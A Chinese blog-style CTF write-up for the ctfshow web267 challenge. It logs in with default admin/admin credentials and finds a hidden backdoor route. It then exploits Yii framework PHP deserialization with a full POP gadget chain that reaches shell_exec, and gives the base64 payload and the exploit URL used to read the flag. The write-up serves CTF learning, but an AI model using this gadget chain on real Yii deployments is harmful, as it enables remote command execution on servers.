0
点赞
收藏
分享

微信扫一扫

PHP反序列化题型_YII框架漏洞利用

目标践行者 2023-11-12 阅读 50

ctfshow web267

用弱口令admin/admin可登录

在about页面发现提示view-source

访问提示页面

?r=site%2Fabout&view-source

页面提示

///backdoor/shell

unserialize(base64_decode($_GET['code']))

因此构造payload必须先base64_encode再serialize

payload获得

<?php
namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'shell_exec';
            $this->id = 'cat /flag | tee 3.txt';				//命令执行
        }
    }
}
namespace Faker {

    use yii\rest\IndexAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            $this->formatters['close'] = [new IndexAction(), 'run'];
        }
    }
}
namespace yii\db{

    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;
        public function __construct()
        {
            $this->_dataReader=new Generator();
        }
    }
}
namespace{

    use yii\db\BatchQueryResult;

    echo base64_encode(serialize(new BatchQueryResult()));
}

?>


payload为:

TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoyMToiY2F0IC9mbGFnIHwgdGVlIDMudHh0Ijt9aToxO3M6MzoicnVuIjt9fX19


执行payload:

http://3f3f9ac5-03f1-4e54-88e7-c00f0a7834be.challenge.ctf.show/index.php?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoyMToiY2F0IC9mbGFnIHwgdGVlIDMudHh0Ijt9aToxO3M6MzoicnVuIjt9fX19

发现页面报错:

An internal server error occurred.

不用管他

访问:http://3f3f9ac5-03f1-4e54-88e7-c00f0a7834be.challenge.ctf.show/3.txt获得flag。


举报

相关推荐

0 条评论